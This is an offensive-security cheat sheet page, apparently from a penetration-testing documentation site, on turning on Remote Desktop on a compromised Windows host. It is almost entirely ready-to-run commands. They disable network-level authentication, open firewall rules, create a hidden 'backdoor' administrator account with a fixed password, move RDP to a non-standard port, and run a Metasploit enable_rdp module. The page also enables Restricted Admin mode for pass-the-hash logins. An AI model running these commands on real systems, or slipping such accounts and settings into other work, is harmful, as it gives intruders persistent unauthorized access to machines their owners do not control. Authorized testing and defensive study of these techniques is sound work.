Post-Exploitation
Enable RDP
Enabling Remote Desktop on a compromised Windows machine for post-exploitation access and persistence.
Documentation Index
Fetch the complete documentation index at: /llms.txt
Use this file to discover all available pages before exploring further.
Enabling Remote Desktop on a compromised Windows machine for post-exploitation access and persistence.
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -Name "fDenyTSConnections" -Value 0
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -Name "fDenyTSConnections" -Value 0; Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
netsh advfirewall firewall set rule group="remote desktop" new enable=yes
netsh advfirewall firewall add rule name="RDP" protocol=TCP dir=in localport=3389 action=allow
net localgroup "Remote Desktop Users" USERNAME /add
net user backdoor Password123! /add
net localgroup "Remote Desktop Users" backdoor /add
net localgroup "Administrators" backdoor /add
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 44300 /f
netsh advfirewall firewall add rule name="RDP-44300" protocol=TCP dir=in localport=44300 action=allow
net stop TermService /y && net start TermService
xfreerdp /v:TARGET_IP /u:USERNAME /p:PASSWORD /cert:ignore +clipboard /dynamic-resolution
xfreerdp /v:TARGET_IP:44300 /u:USERNAME /p:PASSWORD /cert:ignore
mstsc /v:TARGET_IP
msf6 > use post/windows/manage/enable_rdp
msf6 post(enable_rdp) > set SESSION 1
msf6 post(enable_rdp) > set USERNAME backdoor
msf6 post(enable_rdp) > set PASSWORD Password123!
msf6 post(enable_rdp) > run
reg add "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f
xfreerdp /v:TARGET_IP /u:Administrator /pth:NTLM_HASH /cert:ignore
| Method | Command | Requires |
|---|---|---|
| Registry | reg add ... fDenyTSConnections | Admin |
| PowerShell | Set-ItemProperty + Enable-NetFirewallRule | Admin |
| Metasploit | post/windows/manage/enable_rdp | Meterpreter session |
| Restricted Admin | DisableRestrictedAdmin + xfreerdp /pth: | Admin + NTLM hash |